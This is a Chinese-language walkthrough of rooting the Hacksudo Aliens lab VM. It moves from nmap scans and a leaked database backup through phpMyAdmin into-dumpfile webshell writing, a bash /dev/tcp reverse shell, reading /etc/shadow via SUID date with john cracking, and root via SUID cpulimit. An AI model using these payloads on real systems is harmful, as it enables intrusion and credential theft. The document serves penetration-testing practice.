信息收集

注:少见的一台可以使用 VMware Workstation 直接打开的靶机。

  • 首先查看 Kali IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~/Desktop/hacksudo-aliens 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:be:8f:be brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.21/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1321sec preferred_lft 1321sec
    inet6 fe80::ebaa:6e9f:e411:f446/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

  • 使用 Nmap 扫描出一个 IP:10.10.8.24
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 16:39 CST
Nmap scan report for 10.10.8.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000090s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.24
Host is up (0.060s latency).
MAC Address: 00:0C:29:BF:B0:99 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F2:FA:E7 (VMware)
Nmap scan report for 10.10.8.21
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.68 seconds

端口扫描

  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.24 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 16:40 CST
Nmap scan report for 10.10.8.24
Host is up (0.00056s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
| ssh-hostkey: 
|   2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
|   256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_  256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp   open  http
|_http-title: Hacksudo Alien?
9000/tcp open  cslistener
MAC Address: 00:0C:29:BF:B0:99 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.50 seconds

服务识别

  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap -p22,80,9000 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.24 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 17:02 CST
Nmap scan report for 10.10.8.24
Host is up (0.00075s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
|   256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_  256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo Alien?
9000/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: phpMyAdmin
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/
MAC Address: 00:0C:29:BF:B0:99 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.75 ms 10.10.8.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.33 seconds

漏洞扫描

  • 使用 Nmap 进行漏洞扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.24 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 16:40 CST
Nmap scan report for 10.10.8.24
Host is up (0.00082s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /backup/: Backup folder w/ directory listing
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
9000/tcp open  cslistener
MAC Address: 00:0C:29:BF:B0:99 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.90 seconds
  • 看了下扫出来的漏洞,没一个有用的。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root at kali in ~/Desktop/hacksudo-aliens 
$ dirsearch -u http://10.10.8.24 -o $PWD/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                                                                                                           
                                                                                                                                                                                                  
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Desktop/hacksudo-aliens/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-12-12_16-42-34.log

Target: http://10.10.8.24/

[16:42:34] Starting: 
[16:42:35] 403 -  275B  - /.ht_wsr.txt                                     
[16:42:35] 403 -  275B  - /.htaccess.bak1
[16:42:35] 403 -  275B  - /.htaccess.orig
[16:42:35] 403 -  275B  - /.htaccess.save
......

root at kali in ~/Desktop/hacksudo-aliens 
$ cat dirsearch.txt | grep 200  
200    16B   http://10.10.8.24:80/README.md
200   938B   http://10.10.8.24:80/backup/
200    17KB  http://10.10.8.24:80/favicon.ico
200   941B   http://10.10.8.24:80/images/
200     2KB  http://10.10.8.24:80/index.html

漏洞利用

敏感文件泄露

  • 依次访问扫描出的内容,很明显这是一个自建的站点:

image-20231212165055922

  • 访问 9000 端口的内容,是一个 phpmyAdmin 页面:

image-20231212170352870

  • 发现一个备份文件页面:

image-20231212170052654

  • 下载下来看一看:

image-20231212170136567

  • 可以发现数据库的账号密码:vishal/hacksudo
  • 尝试在 9000 端口的 phpMyAdmin 上登录一下:

image-20231212170523370

MySQL 文件写入

  • 查看一下当前 vishal 用户的数据库权限:

image-20231212170610204

  • 和 root 权限一致,尝试搜索 phpMyAdmin 的历史漏洞,当前 phpMyAdmin 的版本为 5.1.0:
1
2
3
4
root at kali in ~/Desktop/hacksudo-aliens 
$ searchsploit phpmyadmin 5.1.0
Exploits: No Results
Shellcodes: No Results
  • 没有结果,尝试翻一翻数据库内的数据:

image-20231212170933187

  • 也没有什么结果,那就还有一种方式:MySQL 写入文件。
  • 查看当前数据库是否具有查看与写入权限:
1
show global variables like '%secure_file_priv%'

image-20231212171346481

  • 发现是空值,有戏:
取值 含义
null 表示不允许读取/写入
dir 表示读取/写入限制在特定目录下
空值 表示读取/写入可以在任意目录下
  • 现在需要判断一下对方的站点根目录:
1
select load_file('/var/www/html/index.html')

image-20231212172031444

  • 判断出对方站点位于 /var/www/html/ 下,直接进行木马写入:
1
select '<?php @eval($_REQUEST[1]);echo 404;?>' into dumpfile '/var/www/html/shell.php'

image-20231212172310013

  • 访问一下:

image-20231212172408468

  • 成功写入~

Bash 反弹

  • 木马上传成功,之前靶机都是使用蚁剑连接,这里直接使用命令执行函数反弹 Shell,会方便很多。
  • 现在 Kali 上开启监听:
1
2
3
root at kali in ~/Desktop/hacksudo-aliens
$ nc -lvvp 4444                                                     
listening on [any] 4444 ...
  • 构造一个 Bash 反弹语句:
1
bash -c 'bash -i &> /dev/tcp/10.10.8.21/4444 0>&1'
  • 使用 BurpSuite 进行 URL 编码:
1
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%26%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%38%2e%32%31%2f%34%34%34%34%20%30%3e%26%31%27
  • 最终的反弹语句如下:
1
http://10.10.8.24/shell.php?1=system("%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%26%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%38%2e%32%31%2f%34%34%34%34%20%30%3e%26%31%27");
  • 反弹成功:
1
2
3
4
5
6
7
8
9
10
root at kali in ~/Desktop/hacksudo-aliens
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.24: inverse host lookup failed: Unknown host
connect to [10.10.8.21] from (UNKNOWN) [10.10.8.24] 37756
bash: cannot set terminal process group (672): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

date 读取文件

  • 可以看到文件权限不是 root,需要提权。
  • 查找一下是否存在有 SUID 命令/文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
www-data@hacksudo:/var/www/html$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
  • 发现了一个奇怪的命令:date,改命令用于获取当前系统的时间。
1
2
3
www-data@hacksudo:/var/www/html$ date
date
Tue Dec 12 11:46:31 EST 2023
  • 但是的但是,date 还可以用于读取文件,从文件中读取日期和时间的格式,并以该格式显示当前日期和时间。
  • 这是不是说明,我可以用 date 去读取任意文件?
  • 读取 /etc/passwd 文件试试(虽然所有用户都能读,主要是做尝试):
1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@hacksudo:/var/www/html$ date -f /etc/passwd
date -f /etc/passwd
date: invalid date 'root:x:0:0:root:/root:/bin/bash'
date: invalid date 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin'
date: invalid date 'bin:x:2:2:bin:/bin:/usr/sbin/nologin'
date: invalid date 'sys:x:3:3:sys:/dev:/usr/sbin/nologin'
date: invalid date 'sync:x:4:65534:sync:/bin:/bin/sync'
date: invalid date 'games:x:5:60:games:/usr/games:/usr/sbin/nologin'
date: invalid date 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin'
date: invalid date 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin'
date: invalid date 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin'
date: invalid date 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin'
......
  • 确实可以,那就去读取 /etc/shadow 文件:
1
2
3
4
5
6
7
8
9
www-data@hacksudo:/var/www/html$ date -f /etc/shadow
date -f /etc/shadow
date: invalid date 'root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::'
date: invalid date 'daemon:*:18714:0:99999:7:::'
......
date: invalid date 'hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::'
date: invalid date 'systemd-coredump:!!:18714::::::'
date: invalid date 'sshd:*:18714:0:99999:7:::'
date: invalid date 'mysql:!:18720:0:99999:7:::'

john 爆破

  • 发现了两个具有密码的用户,保存一下:
1
2
3
4
5
6
7
root at kali in ~/Desktop/hacksudo-aliens 
$ vim root_hash

root at kali in ~/Desktop/hacksudo-aliens 
$ cat root_hash     
root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::
hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::
  • 使用 john 爆破一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root at kali in ~/Desktop/hacksudo-aliens 
$ john root_hash                                                    
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
aliens           (hacksudo)     
Proceeding with incremental:ASCII
......

  • 爆破出来其中的一个密码:hacksudo/aliens。

  • 使用 SSH 登录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~/Desktop/hacksudo-aliens 
$ ssh hacksudo@10.10.8.24
hacksudo@10.10.8.24's password: 
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 12 11:59:59 2023 from 10.10.8.21
hacksudo@hacksudo:~$ id
uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)

cpulimit SUID

  • 可以看到文件权限不是 root,需要提权。
  • 查找一下是否存在有 SUID 命令/文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
hacksudo@hacksudo:~$ find / -perm -4000 2>/dev/null
/home/hacksudo/Downloads/cpulimit
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
  • 发现一个 cpulimit 文件,进入目录运行一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
hacksudo@hacksudo:~$ cd /home/hacksudo/Downloads
hacksudo@hacksudo:~/Downloads$ ./cpulimit 
Error: You must specify a target process
CPUlimit version 2.4
Usage: ./cpulimit TARGET [OPTIONS...] [-- PROGRAM]
   TARGET must be exactly one of these:
      -p, --pid=N        pid of the process
      -e, --exe=FILE     name of the executable program file
                         The -e option only works when
                         cpulimit is run with admin rights.
      -P, --path=PATH    absolute path name of the
                         executable program file
   OPTIONS
      -b  --background   run in background
      -f  --foreground   launch target process in foreground and wait for it to exit
......
  • 看着像是一个限制 cpu 的命令,这就没遇到了,使用 GTFOBins 看看:

image-20231213010743396

  • 还真有,直接执行:
1
2
3
4
hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/bash -p
Process 1429 detected
bash-5.0# id
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
  • 提权成功,获取 flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt
 _   _            _                  _       
| | | | __ _  ___| | _____ _   _  __| | ___  
| |_| |/ _` |/ __| |/ / __| | | |/ _` |/ _ \ 
|  _  | (_| | (__|   <\__ \ |_| | (_| | (_) |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ 
                                             
    _    _ _            ____   __   
   / \  | (_) ___ _ __ | ___| / /_  
  / _ \ | | |/ _ \ '_ \|___ \| '_ \ 
 / ___ \| | |  __/ | | |___) | (_) |
/_/   \_\_|_|\___|_| |_|____/ \___/ 

congratulations you rooted hacksudo alien56...!!!
flag={d045e6f9feb79e94442213f9d008ac48}